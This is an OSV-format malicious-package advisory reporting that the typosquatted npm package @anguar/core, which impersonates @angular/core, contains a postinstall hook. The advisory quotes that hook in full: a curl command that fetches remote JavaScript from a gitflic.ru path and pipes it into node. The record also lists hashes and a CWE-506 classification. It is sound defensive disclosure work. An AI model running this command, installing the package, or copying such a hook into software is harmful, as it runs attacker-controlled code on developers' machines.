{"id":"MAL-2026-17535","summary":"Malicious code in @anguar/core (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (428f991afc1ada001d59a546b8290c039dc16c98f6e497346acd87b8c08034eb)\nPackage @anguar/core impersonates @angular/core: scope name differs by one letter and package.json name, description, author, and repository metadata are copied from the real @angular/core. The package.json declares a postinstall lifecycle hook that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from a gitflic.ru path under the user `hellscripter` (proxied through web.archive.org) and piping it into Node. The remote source is unpinned, unverified, hosted on infrastructure unrelated to the Angular project, and under full control of a third party. Any developer who mistypes the Angular scope and runs `npm install` will execute arbitrary attacker-controlled code on their machine.\n","modified":"2026-10-05T04:15:06.413724726Z","published":"2026-10-05T03:32:55Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-020997","import_time":"2026-10-05T03:57:37.60841487Z","modified_time":"2026-10-05T03:32:55Z","sha256":"428f991afc1ada001d59a546b8290c039dc16c98f6e497346acd87b8c08034eb","source":"amazon-inspector","versions":["22.2.1"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@anguar/core/v/22.2.1"}],"affected":[{"package":{"name":"@anguar/core","ecosystem":"npm","purl":"pkg:npm/%40anguar/core"},"versions":["22.2.1"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"c0f7136db131c2a25bcaabc6362c35f1c8059ebb2991dab8d6437ce85d6b2bc9","tlsh":"fd513624e4f48d6323de6294dd2a4943b138495b5c38bd68b3dd009c8f0e61f21beb9a","path":"package.json"}],"package_integrity":[{"filename":"core-22.2.1.tgz","hashes":{"sha512_sri":"sha512-jNO4ZmAtElQjQjT+jhHnxb31XqC/imxCId4L/Ki4UFwdrUyOQyEU8uFv9l0Unn9EIfz7GfDUtQqMji84khH8Dw==","sha1":"7bf1a0f340f5ecd96d4558e0254168987a6cf094"}}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@anguar/core/MAL-2026-17535.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}